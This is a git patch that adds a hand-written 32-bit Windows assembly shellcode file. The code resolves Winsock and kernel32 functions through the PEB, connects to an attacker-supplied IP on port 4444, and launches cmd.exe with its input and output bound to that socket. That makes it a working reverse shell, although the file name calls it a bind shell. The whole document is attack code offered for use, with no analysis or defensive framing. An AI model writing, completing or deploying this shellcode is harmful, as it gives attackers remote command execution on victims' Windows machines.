From 25a8694173e2f8518a4a6c2b957e847b9e0a1591 Mon Sep 17 00:00:00 2001 From: nevernever69 <97673634+nevernever69@users.noreply.github.com> Date: Thu, 23 Jun 2022 14:10:02 +0530 Subject: [PATCH] Add files via upload here is another smaller way to create an win32 shellcode --- Windows-x86 _Bind-shellcode.asm | 204 ++++++++++++++++++++++++++++++++ 1 file changed, 204 insertions(+) create mode 100644 Windows-x86 _Bind-shellcode.asm diff --git a/Windows-x86 _Bind-shellcode.asm b/Windows-x86 _Bind-shellcode.asm new file mode 100644 index 0000000..bd23398 --- /dev/null +++ b/Windows-x86 _Bind-shellcode.asm @@ -0,0 +1,204 @@ +global _start + +section .text +_start: + + +getkernel32: + xor ecx, ecx ; zeroing register ECX + mul ecx ; zeroing register EAX EDX + mov eax, [fs:ecx + 0x030] ; PEB loaded in eax + mov eax, [eax + 0x00c] ; LDR loaded in eax + mov esi, [eax + 0x014] ; InMemoryOrderModuleList loaded in esi + lodsd ; program.exe address loaded in eax (1st module) + xchg esi, eax + lodsd ; ntdll.dll address loaded (2nd module) + mov ebx, [eax + 0x10] ; kernel32.dll address loaded in ebx (3rd module) + + ; EBX = base of kernel32.dll address + +getAddressofName: + mov edx, [ebx + 0x3c] ; load e_lfanew address in ebx + add edx, ebx + mov edx, [edx + 0x78] ; load data directory + add edx, ebx + mov esi, [edx + 0x20] ; load "address of name" + add esi, ebx + xor ecx, ecx + + ; ESI = RVAs + +getProcAddress: + inc ecx ; ordinals increment + lodsd ; get "address of name" in eax + add eax, ebx + cmp dword [eax], 0x50746547 ; GetP + jnz getProcAddress + cmp dword [eax + 0x4], 0x41636F72 ; rocA + jnz getProcAddress + cmp dword [eax + 0x8], 0x65726464 ; ddre + jnz getProcAddress + +getProcAddressFunc: + mov esi, [edx + 0x24] ; offset ordinals + add esi, ebx ; pointer to the name ordinals table + mov cx, [esi + ecx * 2] ; CX = Number of function + dec ecx + mov esi, [edx + 0x1c] ; ESI = Offset address table + add esi, ebx ; we placed at the begin of AddressOfFunctions array + mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) + add edx, ebx ; EDX = getProcAddress + mov ebp, edx ; save getProcAddress in EBP for future purpose + +getLoadLibraryA: + xor ecx, ecx ; zeroing ecx + push ecx ; push 0 on stack + push 0x41797261 ; + push 0x7262694c ; AyrarbiLdaoL + push 0x64616f4c ; + push esp + push ebx ; kernel32.dll + call edx ; call GetProcAddress and find LoadLibraryA address + + +getws2_32: + push 0x61613233 ; 23 + sub word [esp + 0x2], 0x6161 ; sub aa from aa23_2sw + push 0x5f327377 ; _2sw + push esp ; pointer to the string + call eax ; call Loadlibrary and find ws2_32.dll + mov esi, eax ; save winsock handle for future puproses + + + +getWSAStartup: + push 0x61617075 ; aapu + sub word [esp + 0x2], 0x6161 ; sub aa from aapu + push 0x74726174 ; trat + push 0x53415357 ; SASW + push esp ; pointer to the string + push esi ; winsock handler + call ebp ; GetProcAddress(ws2_32.dll, WSAStartup) + +callWSAStartUp: + xor edx, edx + mov dx, 0x190 ; EAX = sizeof( struct WSAData ) + sub esp, edx ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push edx ; push the wVersionRequested parameter + call eax ; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer) + +getWSASocketA: + push 0x61614174 ; 'aaAt' + sub word [esp + 0x2], 0x6161 ; sub aa from aaAt + push 0x656b636f ; 'ekco' + push 0x53415357 ; 'SASW' + push esp ; pointer to the string + push esi ; socket handler + call ebp ; GetProcAddress(ws2_32.dll, WSASocketA) + + +callWSASocketA: + xor edx, edx ; clear edx + push edx; ; dwFlags=NULL + push edx; ; g=NULL + push edx; ; lpProtocolInfo=NULL + mov dl, 0x6 ; protocol=6 + push edx + sub dl, 0x5 ; edx==1 + push edx ; type=1 + inc edx ; af=2 + push edx + call eax ; call WSASocketA + push eax ; save eax in edx + pop edi ; + + +getConnect: + push 0x61746365 ; atce + sub word [esp + 0x3], 0x61 ; atce - a = tce + push 0x6e6e6f63 ; nnoc + push esp ; pointer to the string + push esi ; socket handler + call ebp ; GetProcAddress(ws2_32.dll, connect) + + + +callConnect: + ;set up sockaddr_in + mov edx, 0xhhhhhhhh ;the IP plus 0x01010101 so we avoid NULLs (IP=should be in the form of hh.hh.hh.hh) hh=hexadecimal value in reverseorder + sub edx, 0x01010101 ;subtract from edx to obtain the real IP + push edx ;push sin_addr + push word 0x5c11 ;0x115c = (port 4444) + xor edx, edx + mov dl, 2 + push dx + mov edx, esp + push byte 0x10 + push edx + push edi + call eax + + +getCreateProcessA: + xor ecx, ecx ; zeroing ECX + push 0x61614173 ; aaAs + sub word [esp + 0x2], 0x6161 ; aaAs - aa + push 0x7365636f ; ecor + push 0x72506574 ; rPet + push 0x61657243 ; aerC + push esp ; push the pointer to stack + push ebx ; kernel32 handler + call ebp ; GetProcAddress(kernel32.dll, CreateProcessA) + mov esi, ebx ; save kernel32.dll handler for future purposes + + + +shell: + push 0x61646d63 ; push admc + sub word [esp + 0x3], 0x61 ; sub a to admc = dmc + mov ebx, esp ; save a pointer to the command line + push edi ; our socket becomes the shells hStdError + push edi ; our socket becomes the shells hStdOutput + push edi ; our socket becomes the shells hStdInput + xor edi, edi ; Clear edi for all the NULL's we need to push + push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack + pop ecx ; Set ECX for the loop + +push_loop: + push edi ; push a null dword + loop push_loop ; keep looping untill we have pushed enough nulls + mov word [esp + 0x3C], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW + mov byte [esp + 0x10], 0x44 + lea ecx, [esp + 0x10] ; Set EAX as a pointer to our STARTUPINFO Structure + + ;perform the call to CreateProcessA + push esp ; Push the pointer to the PROCESS_INFORMATION Structure + push ecx ; Push the pointer to the STARTUPINFO Structure + push edi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent + push edi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent + push edi ; We dont specify any dwCreationFlags + inc edi ; Increment edi to be one + push edi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent + dec edi ; Decrement edi back down to zero + push edi ; Set lpThreadAttributes to NULL + push edi ; Set lpProcessAttributes to NULL + push ebx ; Set the lpCommandLine to point to "cmd",0 + push edi ; Set lpApplicationName to NULL as we are using the command line param instead + call eax + + + +getExitProcess: + add esp, 0x010 ; clean the stack + push 0x61737365 ; asse + sub word [esp + 0x3], 0x61 ; asse -a + push 0x636F7250 ; corP + push 0x74697845 ; tixE + push esp + push esi + call ebp ; GetProcAddress(kernel32.dll, ExitProcess) + + xor ecx, ecx + push ecx + call eax \ No newline at end of file